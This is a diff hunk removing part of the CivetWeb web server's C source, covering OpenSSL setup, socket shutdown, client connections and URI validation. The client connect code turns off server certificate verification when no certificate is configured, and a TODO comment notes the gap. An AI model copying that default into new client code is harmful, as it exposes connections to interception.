-			       "%s: cannot use certificate chain file %s: %s",
-			       __func__,
-			       pem,
-			       ssl_error());
-			return 0;
-		}
-	}
-	return 1;
-}
-
-
-#ifdef OPENSSL_API_1_1
-static unsigned long
-ssl_get_protocol(int version_id)
-{
-	long unsigned ret = SSL_OP_ALL;
-	if (version_id > 0)
-		ret |= SSL_OP_NO_SSLv2;
-	if (version_id > 1)
-		ret |= SSL_OP_NO_SSLv3;
-	if (version_id > 2)
-		ret |= SSL_OP_NO_TLSv1;
-	if (version_id > 3)
-		ret |= SSL_OP_NO_TLSv1_1;
-	return ret;
-}
-#else
-static long
-ssl_get_protocol(int version_id)
-{
-	long ret = SSL_OP_ALL;
-	if (version_id > 0)
-		ret |= SSL_OP_NO_SSLv2;
-	if (version_id > 1)
-		ret |= SSL_OP_NO_SSLv3;
-	if (version_id > 2)
-		ret |= SSL_OP_NO_TLSv1;
-	if (version_id > 3)
-		ret |= SSL_OP_NO_TLSv1_1;
-	return ret;
-}
-#endif /* OPENSSL_API_1_1 */
-
-
-/* SSL callback documentation:
- * https://www.openssl.org/docs/man1.1.0/ssl/SSL_set_info_callback.html
- * https://linux.die.net/man/3/ssl_set_info_callback */
-static void
-ssl_info_callback(const SSL *ssl, int what, int ret)
-{
-	(void)ret;
-
-	if (what & SSL_CB_HANDSHAKE_START) {
-		SSL_get_app_data(ssl);
-	}
-	if (what & SSL_CB_HANDSHAKE_DONE) {
-		/* TODO: check for openSSL 1.1 */
-		//#define SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS 0x0001
-		// ssl->s3->flags |= SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS;
-	}
-}
-
-
-/* Dynamically load SSL library. Set up ctx->ssl_ctx pointer. */
-static int
-set_ssl_option(struct mg_context *ctx)
-{
-	const char *pem;
-	const char *chain;
-	int callback_ret;
-	int should_verify_peer;
-	int peer_certificate_optional;
-	const char *ca_path;
-	const char *ca_file;
-	int use_default_verify_paths;
-	int verify_depth;
-	time_t now_rt = time(NULL);
-	struct timespec now_mt;
-	md5_byte_t ssl_context_id[16];
-	md5_state_t md5state;
-	int protocol_ver;
-	char ebuf[128];
-
-	/* If PEM file is not specified and the init_ssl callback
-	 * is not specified, skip SSL initialization. */
-	if (!ctx) {
-		return 0;
-	}
-	if ((pem = ctx->config[SSL_CERTIFICATE]) == NULL
-	    && ctx->callbacks.init_ssl == NULL) {
-		return 1;
-	}
-	chain = ctx->config[SSL_CERTIFICATE_CHAIN];
-	if (chain == NULL) {
-		chain = pem;
-	}
-	if ((chain != NULL) && (*chain == 0)) {
-		chain = NULL;
-	}
-
-	if (!initialize_ssl(ebuf, sizeof(ebuf))) {
-		mg_cry(fc(ctx), "%s", ebuf);
-		return 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!ssllib_dll_handle) {
-		ssllib_dll_handle = load_dll(ebuf, sizeof(ebuf), SSL_LIB, ssl_sw);
-		if (!ssllib_dll_handle) {
-			mg_cry(fc(ctx), "%s", ebuf);
-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-#ifdef OPENSSL_API_1_1
-	/* Initialize SSL library */
-	OPENSSL_init_ssl(0, NULL);
-	OPENSSL_init_ssl(OPENSSL_INIT_LOAD_SSL_STRINGS
-	                     | OPENSSL_INIT_LOAD_CRYPTO_STRINGS,
-	                 NULL);
-
-	if ((ctx->ssl_ctx = SSL_CTX_new(TLS_server_method())) == NULL) {
-		mg_cry(fc(ctx), "SSL_CTX_new (server) error: %s", ssl_error());
-		return 0;
-	}
-#else
-	/* Initialize SSL library */
-	SSL_library_init();
-	SSL_load_error_strings();
-
-	if ((ctx->ssl_ctx = SSL_CTX_new(SSLv23_server_method())) == NULL) {
-		mg_cry(fc(ctx), "SSL_CTX_new (server) error: %s", ssl_error());
-		return 0;
-	}
-#endif /* OPENSSL_API_1_1 */
-
-	SSL_CTX_clear_options(ctx->ssl_ctx,
-	                      SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | SSL_OP_NO_TLSv1
-	                          | SSL_OP_NO_TLSv1_1);
-	protocol_ver = atoi(ctx->config[SSL_PROTOCOL_VERSION]);
-	SSL_CTX_set_options(ctx->ssl_ctx, ssl_get_protocol(protocol_ver));
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_SINGLE_DH_USE);
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_CIPHER_SERVER_PREFERENCE);
-	SSL_CTX_set_options(ctx->ssl_ctx,
-	                    SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION);
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_NO_COMPRESSION);
-#if !defined(NO_SSL_DL)
-	SSL_CTX_set_ecdh_auto(ctx->ssl_ctx, 1);
-#endif /* NO_SSL_DL */
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wincompatible-pointer-types"
-#endif
-	/* Depending on the OpenSSL version, the callback may be
-	 * 'void (*)(SSL *, int, int)' or 'void (*)(const SSL *, int, int)'
-	 * yielding in an "incompatible-pointer-type" warning for the other
-	 * version. It seems to be "unclear" what is correct:
-	 * https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1147526
-	 * https://www.openssl.org/docs/man1.0.2/ssl/ssl.html
-	 * https://www.openssl.org/docs/man1.1.0/ssl/ssl.html
-	 * https://github.com/openssl/openssl/blob/1d97c8435171a7af575f73c526d79e1ef0ee5960/ssl/ssl.h#L1173
-	 * Disable this warning here.
-	 * Alternative would be a version dependent ssl_info_callback and
-	 * a const-cast to call 'char *SSL_get_app_data(SSL *ssl)' there.
-	 */
-	SSL_CTX_set_info_callback(ctx->ssl_ctx, ssl_info_callback);
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-	/* If a callback has been specified, call it. */
-	callback_ret =
-	    (ctx->callbacks.init_ssl == NULL)
-	        ? 0
-	        : (ctx->callbacks.init_ssl(ctx->ssl_ctx, ctx->user_data));
-
-	/* If callback returns 0, civetweb sets up the SSL certificate.
-	 * If it returns 1, civetweb assumes the calback already did this.
-	 * If it returns -1, initializing ssl fails. */
-	if (callback_ret < 0) {
-		mg_cry(fc(ctx), "SSL callback returned error: %i", callback_ret);
-		return 0;
-	}
-	if (callback_ret > 0) {
-		if (pem != NULL) {
-			(void)SSL_CTX_use_certificate_chain_file(ctx->ssl_ctx, pem);
-		}
-		return 1;
-	}
-
-	/* Use some UID as session context ID. */
-	md5_init(&md5state);
-	md5_append(&md5state, (const md5_byte_t *)&now_rt, sizeof(now_rt));
-	clock_gettime(CLOCK_MONOTONIC, &now_mt);
-	md5_append(&md5state, (const md5_byte_t *)&now_mt, sizeof(now_mt));
-	md5_append(&md5state,
-	           (const md5_byte_t *)ctx->config[LISTENING_PORTS],
-	           strlen(ctx->config[LISTENING_PORTS]));
-	md5_append(&md5state, (const md5_byte_t *)ctx, sizeof(*ctx));
-	md5_finish(&md5state, ssl_context_id);
-
-	SSL_CTX_set_session_id_context(ctx->ssl_ctx,
-	                               (const unsigned char *)&ssl_context_id,
-	                               sizeof(ssl_context_id));
-
-	if (pem != NULL) {
-		if (!ssl_use_pem_file(ctx, pem, chain)) {
-			return 0;
-		}
-	}
-
-	/* Should we support client certificates? */
-	/* Default is "no". */
-	should_verify_peer = 0;
-	peer_certificate_optional = 0;
-	if (ctx->config[SSL_DO_VERIFY_PEER] != NULL) {
-		if (mg_strcasecmp(ctx->config[SSL_DO_VERIFY_PEER], "yes") == 0) {
-			/* Yes, they are mandatory */
-			should_verify_peer = 1;
-			peer_certificate_optional = 0;
-		} else if (mg_strcasecmp(ctx->config[SSL_DO_VERIFY_PEER], "optional")
-		           == 0) {
-			/* Yes, they are optional */
-			should_verify_peer = 1;
-			peer_certificate_optional = 1;
-		}
-	}
-
-	use_default_verify_paths =
-	    (ctx->config[SSL_DEFAULT_VERIFY_PATHS] != NULL)
-	    && (mg_strcasecmp(ctx->config[SSL_DEFAULT_VERIFY_PATHS], "yes") == 0);
-
-	if (should_verify_peer) {
-		ca_path = ctx->config[SSL_CA_PATH];
-		ca_file = ctx->config[SSL_CA_FILE];
-		if (SSL_CTX_load_verify_locations(ctx->ssl_ctx, ca_file, ca_path)
-		    != 1) {
-			mg_cry(fc(ctx),
-			       "SSL_CTX_load_verify_locations error: %s "
-			       "ssl_verify_peer requires setting "
-			       "either ssl_ca_path or ssl_ca_file. Is any of them "
-			       "present in "
-			       "the .conf file?",
-			       ssl_error());
-			return 0;
-		}
-
-		if (peer_certificate_optional) {
-			SSL_CTX_set_verify(ctx->ssl_ctx, SSL_VERIFY_PEER, NULL);
-		} else {
-			SSL_CTX_set_verify(ctx->ssl_ctx,
-			                   SSL_VERIFY_PEER
-			                       | SSL_VERIFY_FAIL_IF_NO_PEER_CERT,
-			                   NULL);
-		}
-
-		if (use_default_verify_paths
-		    && (SSL_CTX_set_default_verify_paths(ctx->ssl_ctx) != 1)) {
-			mg_cry(fc(ctx),
-			       "SSL_CTX_set_default_verify_paths error: %s",
-			       ssl_error());
-			return 0;
-		}
-
-		if (ctx->config[SSL_VERIFY_DEPTH]) {
-			verify_depth = atoi(ctx->config[SSL_VERIFY_DEPTH]);
-			SSL_CTX_set_verify_depth(ctx->ssl_ctx, verify_depth);
-		}
-	}
-
-	if (ctx->config[SSL_CIPHER_LIST] != NULL) {
-		if (SSL_CTX_set_cipher_list(ctx->ssl_ctx, ctx->config[SSL_CIPHER_LIST])
-		    != 1) {
-			mg_cry(fc(ctx), "SSL_CTX_set_cipher_list error: %s", ssl_error());
-		}
-	}
-
-	return 1;
-}
-
-
-static void
-uninitialize_ssl(void)
-{
-#ifdef OPENSSL_API_1_1
-
-	if (mg_atomic_dec(&cryptolib_users) == 0) {
-
-		/* Shutdown according to
-		 * https://wiki.openssl.org/index.php/Library_Initialization#Cleanup
-		 * http://stackoverflow.com/questions/29845527/how-to-properly-uninitialize-openssl
-		 */
-		CONF_modules_unload(1);
-#else
-	int i;
-
-	if (mg_atomic_dec(&cryptolib_users) == 0) {
-
-		/* Shutdown according to
-		 * https://wiki.openssl.org/index.php/Library_Initialization#Cleanup
-		 * http://stackoverflow.com/questions/29845527/how-to-properly-uninitialize-openssl
-		 */
-		CRYPTO_set_locking_callback(NULL);
-		CRYPTO_set_id_callback(NULL);
-		ENGINE_cleanup();
-		CONF_modules_unload(1);
-		ERR_free_strings();
-		EVP_cleanup();
-		CRYPTO_cleanup_all_ex_data();
-		ERR_remove_state(0);
-
-		for (i = 0; i < CRYPTO_num_locks(); i++) {
-			pthread_mutex_destroy(&ssl_mutexes[i]);
-		}
-		mg_free(ssl_mutexes);
-		ssl_mutexes = NULL;
-#endif /* OPENSSL_API_1_1 */
-	}
-}
-#endif /* !NO_SSL */
-
-
-static int
-set_gpass_option(struct mg_context *ctx)
-{
-	if (ctx) {
-		struct mg_file file = STRUCT_FILE_INITIALIZER;
-		const char *path = ctx->config[GLOBAL_PASSWORDS_FILE];
-		if ((path != NULL) && !mg_stat(fc(ctx), path, &file.stat)) {
-			mg_cry(fc(ctx), "Cannot open %s: %s", path, strerror(ERRNO));
-			return 0;
-		}
-		return 1;
-	}
-	return 0;
-}
-
-
-static int
-set_acl_option(struct mg_context *ctx)
-{
-	return check_acl(ctx, (uint32_t)0x7f000001UL) != -1;
-}
-
-
-static void
-reset_per_request_attributes(struct mg_connection *conn)
-{
-	if (!conn) {
-		return;
-	}
-	conn->connection_type =
-	    CONNECTION_TYPE_INVALID; /* Not yet a valid request/response */
-
-	conn->num_bytes_sent = conn->consumed_content = 0;
-
-	conn->path_info = NULL;
-	conn->status_code = -1;
-	conn->content_len = -1;
-	conn->is_chunked = 0;
-	conn->must_close = 0;
-	conn->request_len = 0;
-	conn->throttle = 0;
-	conn->data_len = 0;
-	conn->chunk_remainder = 0;
-	conn->accept_gzip = 0;
-
-	conn->response_info.content_length = conn->request_info.content_length = -1;
-	conn->response_info.http_version = conn->request_info.http_version = NULL;
-	conn->response_info.num_headers = conn->request_info.num_headers = 0;
-	conn->response_info.status_text = NULL;
-	conn->response_info.status_code = 0;
-
-	conn->request_info.remote_user = NULL;
-	conn->request_info.request_method = NULL;
-	conn->request_info.request_uri = NULL;
-	conn->request_info.local_uri = NULL;
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Legacy before split into local_uri and request_uri */
-	conn->request_info.uri = NULL;
-#endif
-}
-
-
-#if 0
-/* Note: set_sock_timeout is not required for non-blocking sockets.
- * Leave this function here (commented out) for reference until
- * CivetWeb 1.9 is tested, and the tests confirme this function is
- * no longer required.
-*/
-static int
-set_sock_timeout(SOCKET sock, int milliseconds)
-{
-        int r0 = 0, r1, r2;
-
-#ifdef _WIN32
-        /* Windows specific */
-
-        DWORD tv = (DWORD)milliseconds;
-
-#else
-        /* Linux, ... (not Windows) */
-
-        struct timeval tv;
-
-/* TCP_USER_TIMEOUT/RFC5482 (http://tools.ietf.org/html/rfc5482):
- * max. time waiting for the acknowledged of TCP data before the connection
- * will be forcefully closed and ETIMEDOUT is returned to the application.
- * If this option is not set, the default timeout of 20-30 minutes is used.
-*/
-/* #define TCP_USER_TIMEOUT (18) */
-
-#if defined(TCP_USER_TIMEOUT)
-        unsigned int uto = (unsigned int)milliseconds;
-        r0 = setsockopt(sock, 6, TCP_USER_TIMEOUT, (const void *)&uto, sizeof(uto));
-#endif
-
-        memset(&tv, 0, sizeof(tv));
-        tv.tv_sec = milliseconds / 1000;
-        tv.tv_usec = (milliseconds * 1000) % 1000000;
-
-#endif /* _WIN32 */
-
-        r1 = setsockopt(
-            sock, SOL_SOCKET, SO_RCVTIMEO, (SOCK_OPT_TYPE)&tv, sizeof(tv));
-        r2 = setsockopt(
-            sock, SOL_SOCKET, SO_SNDTIMEO, (SOCK_OPT_TYPE)&tv, sizeof(tv));
-
-        return r0 || r1 || r2;
-}
-#endif
-
-
-static int
-set_tcp_nodelay(SOCKET sock, int nodelay_on)
-{
-	if (setsockopt(sock,
-	               IPPROTO_TCP,
-	               TCP_NODELAY,
-	               (SOCK_OPT_TYPE)&nodelay_on,
-	               sizeof(nodelay_on)) != 0) {
-		/* Error */
-		return 1;
-	}
-	/* OK */
-	return 0;
-}
-
-
-static void
-close_socket_gracefully(struct mg_connection *conn)
-{
-#if defined(_WIN32)
-	char buf[MG_BUF_LEN];
-	int n;
-#endif
-	struct linger linger;
-	int error_code = 0;
-	int linger_timeout = -2;
-	socklen_t opt_len = sizeof(error_code);
-
-	if (!conn) {
-		return;
-	}
-
-	/* http://msdn.microsoft.com/en-us/library/ms739165(v=vs.85).aspx:
-	 * "Note that enabling a nonzero timeout on a nonblocking socket
-	 * is not recommended.", so set it to blocking now */
-	set_blocking_mode(conn->client.sock);
-
-	/* Send FIN to the client */
-	shutdown(conn->client.sock, SHUTDOWN_WR);
-
-
-#if defined(_WIN32)
-	/* Read and discard pending incoming data. If we do not do that and
-	 * close
-	 * the socket, the data in the send buffer may be discarded. This
-	 * behaviour is seen on Windows, when client keeps sending data
-	 * when server decides to close the connection; then when client
-	 * does recv() it gets no data back. */
-	do {
-		n = pull_inner(NULL, conn, buf, sizeof(buf), /* Timeout in s: */ 1.0);
-	} while (n > 0);
-#endif
-
-	if (conn->ctx->config[LINGER_TIMEOUT]) {
-		linger_timeout = atoi(conn->ctx->config[LINGER_TIMEOUT]);
-	}
-
-	/* Set linger option according to configuration */
-	if (linger_timeout >= 0) {
-		/* Set linger option to avoid socket hanging out after close. This
-		 * prevent ephemeral port exhaust problem under high QPS. */
-		linger.l_onoff = 1;
-
-#if defined(_MSC_VER)
-#pragma warning(push)
-#pragma warning(disable : 4244)
-#endif
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wconversion"
-#endif
-		/* Data type of linger structure elements may differ,
-		 * so we don't know what cast we need here.
-		 * Disable type conversion warnings. */
-
-		linger.l_linger = (linger_timeout + 999) / 1000;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-#if defined(_MSC_VER)
-#pragma warning(pop)
-#endif
-
-	} else {
-		linger.l_onoff = 0;
-		linger.l_linger = 0;
-	}
-
-	if (linger_timeout < -1) {
-		/* Default: don't configure any linger */
-	} else if (getsockopt(conn->client.sock,
-	                      SOL_SOCKET,
-	                      SO_ERROR,
-	                      (char *)&error_code,
-	                      &opt_len) != 0) {
-		/* Cannot determine if socket is already closed. This should
-		 * not occur and never did in a test. Log an error message
-		 * and continue. */
-		mg_cry(conn,
-		       "%s: getsockopt(SOL_SOCKET SO_ERROR) failed: %s",
-		       __func__,
-		       strerror(ERRNO));
-	} else if (error_code == ECONNRESET) {
-		/* Socket already closed by client/peer, close socket without linger
-		 */
-	} else {
-
-		/* Set linger timeout */
-		if (setsockopt(conn->client.sock,
-		               SOL_SOCKET,
-		               SO_LINGER,
-		               (char *)&linger,
-		               sizeof(linger)) != 0) {
-			mg_cry(conn,
-			       "%s: setsockopt(SOL_SOCKET SO_LINGER(%i,%i)) failed: %s",
-			       __func__,
-			       linger.l_onoff,
-			       linger.l_linger,
-			       strerror(ERRNO));
-		}
-	}
-
-	/* Now we know that our FIN is ACK-ed, safe to close */
-	closesocket(conn->client.sock);
-	conn->client.sock = INVALID_SOCKET;
-}
-
-
-static void
-close_connection(struct mg_connection *conn)
-{
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 6; /* to close */
-#endif
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	if (conn->lua_websocket_state) {
-		lua_websocket_close(conn, conn->lua_websocket_state);
-		conn->lua_websocket_state = NULL;
-	}
-#endif
-
-	mg_lock_connection(conn);
-
-	/* Set close flag, so keep-alive loops will stop */
-	conn->must_close = 1;
-
-	/* call the connection_close callback if assigned */
-	if (conn->ctx->callbacks.connection_close != NULL) {
-		if (conn->ctx->context_type == CONTEXT_SERVER) {
-			conn->ctx->callbacks.connection_close(conn);
-		}
-	}
-
-	/* Reset user data, after close callback is called.
-	 * Do not reuse it. If the user needs a destructor,
-	 * it must be done in the connection_close callback. */
-	mg_set_user_connection_data(conn, NULL);
-
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 7; /* closing */
-#endif
-
-#ifndef NO_SSL
-	if (conn->ssl != NULL) {
-		/* Run SSL_shutdown twice to ensure completly close SSL connection
-		 */
-		SSL_shutdown(conn->ssl);
-		SSL_free(conn->ssl);
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		conn->ssl = NULL;
-	}
-#endif
-	if (conn->client.sock != INVALID_SOCKET) {
-		close_socket_gracefully(conn);
-		conn->client.sock = INVALID_SOCKET;
-	}
-
-	mg_unlock_connection(conn);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 8; /* closed */
-#endif
-}
-
-
-void
-mg_close_connection(struct mg_connection *conn)
-{
-#if defined(USE_WEBSOCKET)
-	struct mg_context *client_ctx = NULL;
-#endif /* defined(USE_WEBSOCKET) */
-
-	if ((conn == NULL) || (conn->ctx == NULL)) {
-		return;
-	}
-
-#if defined(USE_WEBSOCKET)
-	if (conn->ctx->context_type == CONTEXT_SERVER) {
-		if (conn->in_websocket_handling) {
-			/* Set close flag, so the server thread can exit. */
-			conn->must_close = 1;
-			return;
-		}
-	}
-	if (conn->ctx->context_type == CONTEXT_WS_CLIENT) {
-
-		unsigned int i;
-
-		/* ws/wss client */
-		client_ctx = conn->ctx;
-
-		/* client context: loops must end */
-		conn->ctx->stop_flag = 1;
-		conn->must_close = 1;
-
-		/* We need to get the client thread out of the select/recv call
-		 * here. */
-		/* Since we use a sleep quantum of some seconds to check for recv
-		 * timeouts, we will just wait a few seconds in mg_join_thread. */
-
-		/* join worker thread */
-		for (i = 0; i < client_ctx->cfg_worker_threads; i++) {
-			if (client_ctx->worker_threadids[i] != 0) {
-				mg_join_thread(client_ctx->worker_threadids[i]);
-			}
-		}
-	}
-#endif /* defined(USE_WEBSOCKET) */
-
-	close_connection(conn);
-
-#ifndef NO_SSL
-	if (conn->client_ssl_ctx != NULL) {
-		SSL_CTX_free((SSL_CTX *)conn->client_ssl_ctx);
-	}
-#endif
-
-#if defined(USE_WEBSOCKET)
-	if (client_ctx != NULL) {
-		/* free context */
-		mg_free(client_ctx->worker_threadids);
-		mg_free(client_ctx);
-		(void)pthread_mutex_destroy(&conn->mutex);
-		mg_free(conn);
-	} else if (conn->ctx->context_type == CONTEXT_HTTP_CLIENT) {
-		mg_free(conn);
-	}
-#else
-	if (conn->ctx->context_type == CONTEXT_HTTP_CLIENT) { /* Client */
-		mg_free(conn);
-	}
-#endif /* defined(USE_WEBSOCKET) */
-}
-
-
-/* Only for memory statistics */
-static struct mg_context common_client_context;
-
-
-static struct mg_connection *
-mg_connect_client_impl(const struct mg_client_options *client_options,
-                       int use_ssl,
-                       char *ebuf,
-                       size_t ebuf_len)
-{
-	struct mg_connection *conn = NULL;
-	SOCKET sock;
-	union usa sa;
-	struct sockaddr *psa;
-	socklen_t len;
-
-	unsigned max_req_size =
-	    (unsigned)atoi(config_options[MAX_REQUEST_SIZE].default_value);
-
-	/* Size of structures, aligned to 8 bytes */
-	size_t conn_size = ((sizeof(struct mg_connection) + 7) >> 3) << 3;
-	size_t ctx_size = ((sizeof(struct mg_context) + 7) >> 3) << 3;
-
-	conn = (struct mg_connection *)mg_calloc_ctx(1,
-	                                             conn_size + ctx_size
-	                                                 + max_req_size,
-	                                             &common_client_context);
-
-	if (conn == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "calloc(): %s",
-		            strerror(ERRNO));
-		return NULL;
-	}
-
-	conn->ctx = (struct mg_context *)(((char *)conn) + conn_size);
-	conn->buf = (((char *)conn) + conn_size + ctx_size);
-	conn->buf_size = (int)max_req_size;
-	conn->ctx->context_type = CONTEXT_HTTP_CLIENT;
-
-	if (!connect_socket(&common_client_context,
-	                    client_options->host,
-	                    client_options->port,
-	                    use_ssl,
-	                    ebuf,
-	                    ebuf_len,
-	                    &sock,
-	                    &sa)) {
-		/* ebuf is set by connect_socket,
-		 * free all memory and return NULL; */
-		mg_free(conn);
-		return NULL;
-	}
-
-#ifndef NO_SSL
-#ifdef OPENSSL_API_1_1
-	if (use_ssl
-	    && (conn->client_ssl_ctx = SSL_CTX_new(TLS_client_method())) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "SSL_CTX_new error");
-		closesocket(sock);
-		mg_free(conn);
-		return NULL;
-	}
-#else
-	if (use_ssl
-	    && (conn->client_ssl_ctx = SSL_CTX_new(SSLv23_client_method()))
-	           == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "SSL_CTX_new error");
-		closesocket(sock);
-		mg_free(conn);
-		return NULL;
-	}
-#endif /* OPENSSL_API_1_1 */
-#endif /* NO_SSL */
-
-
-#ifdef USE_IPV6
-	len = (sa.sa.sa_family == AF_INET) ? sizeof(conn->client.rsa.sin)
-	                                   : sizeof(conn->client.rsa.sin6);
-	psa = (sa.sa.sa_family == AF_INET)
-	          ? (struct sockaddr *)&(conn->client.rsa.sin)
-	          : (struct sockaddr *)&(conn->client.rsa.sin6);
-#else
-	len = sizeof(conn->client.rsa.sin);
-	psa = (struct sockaddr *)&(conn->client.rsa.sin);
-#endif
-
-	conn->client.sock = sock;
-	conn->client.lsa = sa;
-
-	if (getsockname(sock, psa, &len) != 0) {
-		mg_cry(conn, "%s: getsockname() failed: %s", __func__, strerror(ERRNO));
-	}
-
-	conn->client.is_ssl = use_ssl ? 1 : 0;
-	(void)pthread_mutex_init(&conn->mutex, &pthread_mutex_attr);
-
-#ifndef NO_SSL
-	if (use_ssl) {
-		common_client_context.ssl_ctx = conn->client_ssl_ctx;
-
-		/* TODO: Check ssl_verify_peer and ssl_ca_path here.
-		 * SSL_CTX_set_verify call is needed to switch off server
-		 * certificate checking, which is off by default in OpenSSL and
-		 * on in yaSSL. */
-		/* TODO: SSL_CTX_set_verify(conn->client_ssl_ctx,
-		 * SSL_VERIFY_PEER, verify_ssl_server); */
-
-		if (client_options->client_cert) {
-			if (!ssl_use_pem_file(&common_client_context,
-			                      client_options->client_cert,
-			                      NULL)) {
-				mg_snprintf(NULL,
-				            NULL, /* No truncation check for ebuf */
-				            ebuf,
-				            ebuf_len,
-				            "Can not use SSL client certificate");
-				SSL_CTX_free(conn->client_ssl_ctx);
-				closesocket(sock);
-				mg_free(conn);
-				return NULL;
-			}
-		}
-
-		if (client_options->server_cert) {
-			SSL_CTX_load_verify_locations(conn->client_ssl_ctx,
-			                              client_options->server_cert,
-			                              NULL);
-			SSL_CTX_set_verify(conn->client_ssl_ctx, SSL_VERIFY_PEER, NULL);
-		} else {
-			SSL_CTX_set_verify(conn->client_ssl_ctx, SSL_VERIFY_NONE, NULL);
-		}
-
-		if (!sslize(conn,
-		            conn->client_ssl_ctx,
-		            SSL_connect,
-		            &(conn->ctx->stop_flag))) {
-			mg_snprintf(NULL,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "SSL connection error");
-			SSL_CTX_free(conn->client_ssl_ctx);
-			closesocket(sock);
-			mg_free(conn);
-			return NULL;
-		}
-	}
-#endif
-
-	if (0 != set_non_blocking_mode(sock)) {
-		/* TODO: handle error */
-		;
-	}
-
-	return conn;
-}
-
-
-CIVETWEB_API struct mg_connection *
-mg_connect_client_secure(const struct mg_client_options *client_options,
-                         char *error_buffer,
-                         size_t error_buffer_size)
-{
-	return mg_connect_client_impl(client_options,
-	                              1,
-	                              error_buffer,
-	                              error_buffer_size);
-}
-
-
-struct mg_connection *
-mg_connect_client(const char *host,
-                  int port,
-                  int use_ssl,
-                  char *error_buffer,
-                  size_t error_buffer_size)
-{
-	struct mg_client_options opts;
-	memset(&opts, 0, sizeof(opts));
-	opts.host = host;
-	opts.port = port;
-	return mg_connect_client_impl(&opts,
-	                              use_ssl,
-	                              error_buffer,
-	                              error_buffer_size);
-}
-
-
-static const struct {
-	const char *proto;
-	size_t proto_len;
-	unsigned default_port;
-} abs_uri_protocols[] = {{"http://", 7, 80},
-                         {"https://", 8, 443},
-                         {"ws://", 5, 80},
-                         {"wss://", 6, 443},
-                         {NULL, 0, 0}};
-
-
-/* Check if the uri is valid.
- * return 0 for invalid uri,
- * return 1 for *,
- * return 2 for relative uri,
- * return 3 for absolute uri without port,
- * return 4 for absolute uri with port */
-static int
-get_uri_type(const char *uri)
-{
-	int i;
-	const char *hostend, *portbegin;
-	char *portend;
-	unsigned long port;
-
-	/* According to the HTTP standard
-	 * http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
-	 * URI can be an asterisk (*) or should start with slash (relative uri),
-	 * or it should start with the protocol (absolute uri). */
-	if ((uri[0] == '*') && (uri[1] == '\0')) {
-		/* asterisk */
-		return 1;
-	}
-
-	/* Valid URIs according to RFC 3986
-	 * (https://www.ietf.org/rfc/rfc3986.txt)
-	 * must only contain reserved characters :/?#[]@!$&'()*+,;=
-	 * and unreserved characters A-Z a-z 0-9 and -._~
-	 * and % encoded symbols.
-	 */
-	for (i = 0; uri[i] != 0; i++) {
-		if (uri[i] < 33) {
-			/* control characters and spaces are invalid */
-			return 0;
-		}
-		if (uri[i] > 126) {
-			/* non-ascii characters must be % encoded */
-			return 0;
-		} else {
-			switch (uri[i]) {
-			case '"':  /* 34 */
-			case '<':  /* 60 */
-			case '>':  /* 62 */
-			case '\\': /* 92 */
-			case '^':  /* 94 */
-			case '`':  /* 96 */
-			case '{':  /* 123 */
-			case '|':  /* 124 */
-			case '}':  /* 125 */
-				return 0;
-			default:
-				/* character is ok */
-				break;
-			}
-		}
-	}
-
-	/* A relative uri starts with a / character */
-	if (uri[0] == '/') {
-		/* relative uri */
-		return 2;
-	}
-
-	/* It could be an absolute uri: */
-	/* This function only checks if the uri is valid, not if it is
-	 * addressing the current server. So civetweb can also be used
-	 * as a proxy server. */
-	for (i = 0; abs_uri_protocols[i].proto != NULL; i++) {
-		if (mg_strncasecmp(uri,
-		                   abs_uri_protocols[i].proto,
-		                   abs_uri_protocols[i].proto_len) == 0) {
-
-			hostend = strchr(uri + abs_uri_protocols[i].proto_len, '/');
-			if (!hostend) {
-				return 0;
-			}
-			portbegin = strchr(uri + abs_uri_protocols[i].proto_len, ':');
-			if (!portbegin) {
-				return 3;
-			}
-
-			port = strtoul(portbegin + 1, &portend, 10);
-			if ((portend != hostend) || (port <= 0) || !is_valid_port(port)) {
-				return 0;
-			}
-
-			return 4;
-		}
-	}
-
-	return 0;
-}
-
-
-/* Return NULL or the relative uri at the current server */
-static const char *
-get_rel_url_at_current_server(const char *uri, const struct mg_connection *conn)
-{
-	const char *server_domain;
-	size_t server_domain_len;
-	size_t request_domain_len = 0;
-	unsigned long port = 0;
-	int i, auth_domain_check_enabled;
-	const char *hostbegin = NULL;
-	const char *hostend = NULL;
-	const char *portbegin;
-	char *portend;
-
-	auth_domain_check_enabled =
-	    !mg_strcasecmp(conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK], "yes");
-
-	if (!auth_domain_check_enabled) {
-		return 0;
-	}
-
-	server_domain = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	if (!server_domain) {
-		return 0;
-	}
-	server_domain_len = strlen(server_domain);
-	if (!server_domain_len) {
-		return 0;
-	}
-
-	/* DNS is case insensitive, so use case insensitive string compare here
-	 */
